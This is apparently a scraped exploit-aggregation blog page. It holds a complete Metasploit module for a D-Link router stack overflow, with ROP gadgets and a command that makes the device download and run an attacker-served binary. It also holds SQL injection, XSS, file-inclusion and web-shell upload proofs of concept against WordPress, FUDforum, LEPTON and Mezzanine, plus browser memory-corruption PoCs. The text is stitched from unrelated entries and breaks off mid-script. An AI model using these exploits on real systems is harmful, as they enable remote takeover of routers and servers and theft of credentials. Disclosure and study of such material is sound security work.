##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Payload working status:
# MIPS:
# - all valid payloads working (the ones that we are able to send without null bytes)
# ARM:
# - inline rev/bind shell works (bind... meh sometimes)
# - stager rev/bind shell FAIL
# - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb...
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow',
'Description' => %q{
Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which
is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol,
which accepts arbitrarily long strings into certain XML parameters and then copies them into
the stack.
This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested
using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and
this vulnerability is present in both MIPS and ARM devices.
The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a
few load and store instructions. Because of this the payloads have to be sent unencoded, which
can cause them to fail, although the bind shell seems to work well.
For the ARM devices, the inline reverse tcp seems to work best.
Check the reference links to see the vulnerable firmware versions.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'References' =>
[
['CVE', '2016-6563'],
['US-CERT-VU', '677427'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'],
['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38']
],
'DefaultOptions' => { 'WfsDelay' => 10 },
'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground (ARM target)
'Targets' =>
[
[ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]',
{
'Offset' => 3072,
'LibcBase' => 0x2aabe000, # should be the same offset for all firmware versions and all routers
'Sleep' => 0x56DF0, # sleep() offset into libuClibc-0.9.30.3.so
'FirstGadget' => 0x4EA1C, # see comments below for gadget information
'SecondGadget' => 0x2468C,
'ThirdGadget' => 0x41f3c,
'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi sp,sp,-3128
'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr sp
'BranchDelay' => "\x20\x84\xf8\x30", # addi a0,a0,-2000 (nop)
'Arch' => ARCH_MIPSBE,
'Payload' =>
{
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::Raw # else it will fail with SIGILL, this CPU is crippled
},
}
],
[ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]',
{
'Offset' => 1024,
'LibcBase' => 0x400DA000, # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well)
'System' => 0x5A270, # system() offset into libuClibc-0.9.32.1.so
'FirstGadget' => 0x18298, # see comments below for gadget information
'SecondGadget' => 0x40CB8,
'Arch' => ARCH_ARMLE,
}
],
],
'DisclosureDate' => 'Nov 7 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']),
OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']),
OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']),
OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/',
'method' => 'POST',
'Content-Type' => 'text/xml',
'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' }
})
if res && res.code == 500
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def calc_encode_addr (offset, big_endian = true)
if big_endian
[(target['LibcBase'] + offset).to_s(16)].pack('H*')
else
[(target['LibcBase'] + offset).to_s(16)].pack('H*').reverse
end
end
def prepare_shellcode_arm (cmd)
#All these gadgets are from /lib/libuClibc-0.9.32.1.so, which is the library used for all versions of firmware for all ARM routers
#first_gadget (pops system() address into r3, and second_gadget into PC):
#.text:00018298 LDMFD SP!, {R3,PC}
#second_gadget (puts the stack pointer into r0 and calls system() at r3):
#.text:00040CB8 MOV R0, SP
#.text:00040CBC BLX R3
#system() (Executes argument in r0 (our stack pointer)
#.text:0005A270 system
#The final payload will be:
#'a' * 1024 + 0xffffffff + 'b' * 16 + 'AAAA' + first_gadget + system() + second_gadget + command
shellcode = rand_text_alpha(target['Offset']) + # filler
"\xff\xff\xff\xff" + # n integer overwrite (see advisory)
rand_text_alpha(16) + # moar filler
rand_text_alpha(4) + # r11
calc_encode_addr(target['FirstGadget'], false) + # first_gadget
calc_encode_addr(target['System'], false) + # system() address
calc_encode_addr(target['SecondGadget'], false) + # second_gadget
cmd # our command
end
def prepare_shellcode_mips
#All these gadgets are from /lib/libuClibc-0.9.30.3.so, which is the library used for all versions of firmware for all MIPS routers
#<sleep> is at 56DF0
#first gadget - execute sleep and call second_gadget
#.text:0004EA1C move $t9, $s0 <- sleep()
#.text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget
#.text:0004EA24 li $a0, 2 <- arg for sleep()
#.text:0004EA28 lw $s0, 0x20+var_8($sp)
#.text:0004EA2C li $a1, 1
#.text:0004EA30 move $a2, $zero
#.text:0004EA34 jr $t9
#.text:0004EA38 addiu $sp, 0x20
#second gadget - put stack pointer in a1:
#.text:0002468C addiu $s1, $sp, 0x58
#.text:00024690 li $s0, 0x44
#.text:00024694 move $a2, $s0
#.text:00024698 move $a1, $s1
#.text:0002469C move $t9, $s4
#.text:000246A0 jalr $t9
#.text:000246A4 move $a0, $s2
#third gadget - call $a1 (stack pointer):
#.text:00041F3C move $t9, $a1
#.text:00041F40 move $a1, $a2
#.text:00041F44 addiu $a0, 8
#.text:00041F48 jr $t9
#.text:00041F4C nop
#When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (2000+ bytes), we can jump back to the beggining of the buffer.
#prep_shellcode_1: 23bdf7a8 addi sp,sp,-3128
#prep_shellcode_2: 03a0f809 jalr sp
#branch_delay: 2084f830 addi a0,a0,-2000
#The final payload will be:
#shellcode + 'a' * (2064 - shellcode.size) + sleep() + '%31' * 4 + '%32' * 4 + '%33' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay
shellcode = payload.encoded + # exploit
rand_text_alpha(target['Offset'] - payload.encoded.length) + # filler
calc_encode_addr(target['Sleep']) + # s0
rand_text_alpha(4) + # s1
rand_text_alpha(4) + # s2
rand_text_alpha(4) + # s3
calc_encode_addr(target['ThirdGadget']) + # s4 (third gadget)
calc_encode_addr(target['FirstGadget']) + # initial pc / ra (first_gadget)
rand_text_alpha(0x1c) + # filler
calc_encode_addr(target['SecondGadget']) + # second_gadget
rand_text_alpha(0x58) + # filler
target['PrepShellcode1'] + # exploit prep
target['PrepShellcode2'] + # exploit prep
target['BranchDelay'] # exploit prep
end
def send_payload (payload)
begin
# the payload can go in the Action, Username, LoginPassword or Captcha XML tag
body = %{
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Login xmlns="http://purenetworks.com/HNAP1/">
<Action>something</Action>
<Username>Admin</Username>
<LoginPassword></LoginPassword>
<Captcha>#{payload}</Captcha>
</Login>
</soap:Body>
</soap:Envelope>
}
res = send_request_cgi({
'uri' => '/HNAP1/',
'method' => 'POST',
'ctype' => 'text/xml',
'headers' => { 'SOAPAction' => 'http://purenetworks.com/HNAP1/Login' },
'data' => body
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
# Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @pl)
print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{peer} - Sending the payload to the device...")
@elf_sent = true
send_response(cli, @pl)
end
def exploit
print_status("#{peer} - Attempting to exploit #{target.name}")
if target == targets[0]
send_payload(prepare_shellcode_mips)
else
downfile = rand_text_alpha(8+rand(8))
@pl = generate_payload_exe
@elf_sent = false
resource_uri = '/' + downfile
#do not use SSL
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{peer} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
print_status("#{peer} - Asking the device to download and execute #{service_url}")
filename = rand_text_alpha_lower(rand(8) + 2)
cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
shellcode = prepare_shellcode_arm(cmd)
print_status("#{peer} - \"Bypassing\" the device's ASLR. This might take up to 15 minutes.")
counter = 0.00
while (not @elf_sent)
if counter % 50.00 == 0 && counter != 0.00
print_status("#{peer} - Tried #{counter.to_i} times in #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
end
send_payload(shellcode)
sleep datastore['SLEEP'].to_f # we need to be in the LAN, so a low value (< 1s) is fine
counter += 1
end
print_status("#{peer} - The device downloaded the payload after #{counter.to_i} tries / #{(counter * datastore['SLEEP'].to_f).to_i} seconds.")
end
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863587824
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Olimometer Plugin for WordPress – Sql Injection
# Date: 14/11/2016
# Exploit Author: TAD GROUP
# Vendor Homepage: https://wordpress.org/plugins/olimometer/
# Software Link: https://wordpress.org/plugins/olimometer/
# Contact: info[at]tad.group
# Website: https://tad.group
# Category: Web Application Exploits
# Tested on: Debian 8
1 - Description
# Vulnerable parameter: olimometer_id=
Parameter: olimometer_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: olimometer_id=1 AND 6227=6227
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: olimometer_id=1 AND SLEEP(5)
Using GET SQL Method with the "olimometer_id" parameter, we were able to
get the database name from the EXAMPLE.COM website . By further running
SQL Map using different arguments, we would be able to get the complete
database, including usernames and passwords if there are such.
2. Proof of Concept
Using the website EXAMPLE.COM for example, we can fire up sqlmap and set
the full path to the vulnerable parameter:
root@kali:~# sqlmap -u
http://EXAMPLE.COM/wp-content/plugins/olimometer/thermometer.php?olimometer_
id=1
--dbs --threads=5 --random-agent --no-cast
---
Parameter: olimometer_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: olimometer_id=1 AND 6227=6227
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: olimometer_id=1 AND SLEEP(5)
---
[11:14:21] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[11:14:21] [INFO] fetching database names
[11:14:21] [INFO] fetching number of databases
[11:14:21] [INFO] retrieved:
[11:14:21] [WARNING] multi-threading is considered unsafe in time-based
data retrieval. Going to switch it off automatically
[11:14:21] [WARNING] (case) time-based comparison requires larger
statistical model, please wait.............................. (done)
[11:14:26] [WARNING] it is very important to not stress the network
adapter during usage of time-based payloads to prevent potential disruptions
[11:14:26] [ERROR] unable to retrieve the number of databases
[11:14:26] [INFO] falling back to current database
[11:14:26] [INFO] fetching current database
[11:14:26] [INFO] retrieving the length of query output
[11:14:26] [INFO] retrieved:
[11:14:28] [INFO] heuristics detected web page charset 'ascii'
14
[11:15:26] [INFO] retrieved: *****_wrdp1
available databases [1]:
[*] *****_wrdp1
We can see that we have successfully discovered one available database
with the name: "*****_wrdp1"
3. Type of vulnerability:
An SQL Injection vulnerability in Olimometer allows attackers to read
arbitrary data from the database.
4. Exploitation vector:
The url parameter 'olimometer_id=' of the
/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 is
vulnerable to SQLI.
5. Attack outcome:
An attacker can read arbitrary data from the database. If the webserver
is misconfigured, read & write access the filesystem may be possible.
6. Impact:
Critical
7. Software/Product name:
Olimometer Plugin for WordPress
8. Affected versions:
<= 2.56
9. Fixed in version:
Not fixed at the date of submitting that exploit.
10. Vendor:
oshingler
11. CVE number:
Not existing
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://fudforum.org/forum/
Vulnerability Type: LFI
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to local file inclusion. This allows an attacker to read arbitrary files that
the web user has access to.
Admin credentials are required.
3. Details
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
Description: The "file" parameter of the hlplist.php script is vulnerable to
directory traversal, which allows the viewing of arbitrary files.
Proof of Concept:
http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=
4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://fudforum.org/forum/
Vulnerability Type: XSS, Login CSRF
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to multiple persistent XSS issues. This allows an attacker to steal cookies,
inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum
is vulnerable to Login-CSRF.
3. Details
XSS 1: Via Filename in Private Message
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: The filename of attached images in private messages is vulnerable
to persistent XSS.
Proof of Concept:
Send a PM to a user. Add an attachment, where the filename is: '"><img src=no
onerror=alert(1)>.jpg When the recipient views the PM, the injected code will
be executed.
XSS 2: Via Filename in Forum Posts
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: The filename of attached images in forum posts is vulnerable to
persistent XSS.
Proof of Concept:
Create a new forum post. Add an attachment, where the filename is: '"><img src=
no onerror=alert(1)>.jpg When viewing the post the injected code will be
executed.
XSS 3: Via Signature in User Profile
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When editing a profile, the signature is echoed unencoded, leading
to persistent XSS.
Proof of Concept:
Visit http://localhost/fudforum/index.php?t=register as signature, use '"></
textarea><img src=no onerror=alert(1)> The injected code is either executed
when the user themselves edits their profile - which may be exploited via login
CSRF - or when an admin visits the edit profile page located here: http://
localhost/fudforum/index.php?t=register&mod_id=6&&SQ=
1a85a858f326ec6602cb6d78d698f60a
Login CSRF
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: The login of FUDForum does not have any CSRF protection. The
impact of this is low, but an attacker might get a victim to disclose sensitive
information by using CSRF to log the victim into an attacker-controlled
account. An example would be the accidental sending of a sensitive private
message while being logged into an account controlled by an attacker.
Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the
user area.
Proof of Concept:
<html> <body> <form action="http://localhost/fudforum/index.php?t=login" method
="POST"> <input type="hidden" name="login" value="admin" /> <input type=
"hidden" name="password" value="admin" /> <input type="hidden" name="SQ" value=
"0" /> <input type="hidden" name="adm" value="" /> <input type="submit" value=
"Submit request" /> </form> </body> </html>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to 11/10/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to code execution as it is possible to upload files with dangerous
type via the media manager.
3. Details
Upload of file with dangerous type
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description: When uploading a file in the media tab, there is a client-side as
well as a server-side extension check. The server-side check can be bypassed by
including a valid extension before the desired extension, leading to code
execution or XSS.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=
099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid=
8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data;
boundary=---------------------------38397165016927337851258279296
Content-Length: 613 -----------------------------38397165016927337851258279296
Content-Disposition: form-data; name="action" media_upload
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="current_dir"
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png <?
php passthru($_GET['x']);
-----------------------------38397165016927337851258279296 Content-Disposition:
form-data; name="submit" Upload File(s)
-----------------------------38397165016927337851258279296-- http://localhost/
LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id
4. Solution
To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version Link: http://www.lepton-cms.org/posts/
important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to 11/10/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to multiple SQL injections. The injections require a user account
with elevated privileges.
3. Details
SQL Injection: Search Page
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: The "terms" parameter of the page search is vulnerable to SQL
Injection. A user account with the right "Pages" is required to access this
feature.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=
3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 154 search_scope=title&terms=" union select
username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
from lep_users -- -&search=Search
Blind or Error-based SQL Injection: Create Page
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: The "parent" parameter of the create page functionality is
vulnerable to SQL Injection. A user account with the right "Pages" is required
to access this feature. The injection is blind or error based in the case that
PHP is configured to show errors.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=
dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language:
en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=
fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close Content-Type: application/x-www-form-urlencoded
Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()&
visibility=public&submit=Add
Blind or Error-based SQL Injection: Add Droplet
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: The "Add_droplets" parameter of the droplet permission manager is
vulnerable to SQL injection. A user account with access to the Droplets
administration tool is required. The injection is blind or error based in the
case that PHP is configured to show errors.
Proof of Concept:
POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&
leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:
PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=
f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool=
droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute=
'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&
Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&
Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save
4. Solution
To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Mezzanine 4.2.0
Fixed in: 4.2.1
Fixed Version Link: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website: http://mezzanine.jupo.org/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Mezzanine is an open source CMS written in python. In version 4.2.0, it is
vulnerable to two persistent XSS attacks, one of which requires extended
privileges, the other one does not. These issues allow an attacker to steal
cookies, inject JavaScript keyloggers, or bypass CSRF protection.
3. Details
XSS 1: Persistent XSS via Name in Comments
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When leaving a comment on a blog post, the author name is echoed
unencoded in the backend, leading to persistent XSS.
Proof of Concept:
Leave a comment, as author name use '"><img src=no onerror=alert(1)> To trigger
the payload, view the comment overview in the admin backend: http://
localhost:8000/admin/generic/threadedcomment
XSS 2: Persistent XSS via HTML file upload
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N
Description: When uploading files via the media manager, the extension .html is
allowed, leading to XSS via file upload. An account with the permissions to
upload files to the media manager is required.
Proof of Concept:
Visit the media manager and upload a .html file: http://localhost:8000/admin/
media-library/upload/?ot=desc&o=date As uploaded files are stored inside the
web root, it can now be accessed, thus executing the JavaScript code it
contains: http://localhost:8000/static/media/uploads/xss.html
4. Solution
To mitigate this issue please upgrade at least to version 4.2.1:
https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
<!--
Source: http://blog.skylined.nl/20161116001.html
Synopsis
A specially crafted web-page can cause the Javascript engine of Microsoft Internet Explorer 8 to free memory used for a string. The code will keep a reference to the string and can be forced to reuse it when compiling a regular expression.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
-->
<!DOCTYPE html>
<html>
<script>
// This PoC attempts to exploit a use-after-free bug in Microsoft Internet
// Explorer 8.
// See http://blog.skylined.nl/20161116001.html for details.
var r=new RegExp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g");
"A".replace(r, function (){
// Force OLEAUT32 to free the string
for (var j = 0; j < 16; j++) new Array(0x1000).join("B");
// Reuse the freed memory
r.compile();
});
// This work by SkyLined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
</script>
</html>
<!--
Description
Recompiling the regular expression pattern during a replace can cause the code to reuse a freed string, but only if the string is freed from the cache by allocating and freeing a number of strings of certain size, as explained by Alexander Sotirov in his Heap Feng-Shui presentation.
Exploit
Exploitation was not investigated.
Time-line
March 2015: This vulnerability was found through fuzzing.
March 2015: This vulnerability was submitted to ZDI.
April 2015: This vulnerability was acquired by ZDI.
October 2015: Microsoft addressed this issue in MS15-018.
November 2016: Details of this issue are released.
-->
<!--
Source: http://blog.skylined.nl/20161118002.html
Synopsis
A specially crafted web-page can cause an integer underflow in Microsoft Edge. This causes CTextExtractor::GetBlockText to read data outside of the bounds of a memory block.
Known affected software, attack vectors and mitigations
Microsoft Edge 11.0.10240.16384
An attacker would need to get a target user to open a specially crafted web-page. JavaScript is not necessarily required to trigger the issue.
Repro.html
<!DOCTYPE html>
<style>
*::first-letter{ border: 0; }
*{ white-space: pre-line; }
</style>
<body>
A<script>alert();</script>

B
</body>
Description
Though I did not investigate thoroughly, I did find out the following:
The root cause appears to be an integer underflow in a 32-bit variable used in CTextExtractor..GetBlockText as an index to read a WCHAR in a string buffer. This index is decreased once too often and becomes -1, or a very large positive number depending on how it is used.
This does not result in a crash on 32-bit systems, as an integer wrap causes the code to read one WCHAR before the start of the buffer, which is normally also in allocated memory.
On 64-bit systems, the 32-bit -1 value is interpreted as 0xFFFFFFFF, a very large positive value. As this is an index into a WCHAR string, it gets multiplied by two and added to the start of the buffer to find the location of a WCHAR to read. This causes the OOB read to be around 8Gb (!!) beyond the address at which the buffer is allocated.
The crash happens in code that appears to be rendering the web-page, which does not immediately offer an obvious way of extracting information using this bug.
Exploit
This is where it gets interesting, as the OOB read happens approximately 0x2`00000000 bytes after the address at which the buffer is allocated. This presents us with a problem: how to store some information that we'd be interested in reading at such a large offset from the original allocation?
As one might come to expect from me, I used a heap spray. But it needed to be a special kind of heap spray as I did not want to actually have to allocate 8Gb of RAM. However, about ten years ago (boy, time flies!) I developed a heap spray that uses significantly less RAM than a traditional heap spray does; in practice probably about 33% in most cases, but theoretically much more in ideal situations. I've been meaning to blog about it, but never found the time to do so until today: you can read all about it here.
That said, I have not actually looked at whether it is possible to exfiltrate useful information using this bug. However, I did write a Proof-of-Concept that attempts to make sure something is allocated in the area where the OOB read happens. This PoC uses these heap spray tricks to spray the heap while minimizing memory use. The Proof-of-Concept uses about ~5.3Gb to allocate the memory at around 8Gb distance from the buffer (up to ~10Gb to be sure). When you load the PoC in a 64-bit version of Edge, you may notice that, unlike the original repro, it will not crash Edge (even though it does trigger the issues): the heap spray has allocated the memory that the out-of-bounds read accesses, and this prevents an access violation exception. Refreshing the page is likely to screw up the precise allocation process needed and will probably cause a crash.
This proves that it is theoretically possible to allocate information at the address used by the code. All that is left is prove that the information read by the code can be exfiltrated somehow, and you have a working exploit. This is left as an exercises to the reader.
-->
<!DOCTYPE html>
<style>
*::first-letter{ border: 0; }
*{ white-space: pre-line; }
</style>
<body>
A<script>
var aiAllocationSizes = [ // max address ------. .---- RAM allocated
-0x4000, // 4000 4000 4000
0x1000, // | 1000 5000 5000
-0x5000, // -4000 | 5000 a000 6000
0x5000, // | | 5000 f000 b000
-0x7000, // | -5000 | 7000 16000 d000
0x6000, // | | | 6000 1c000 13000
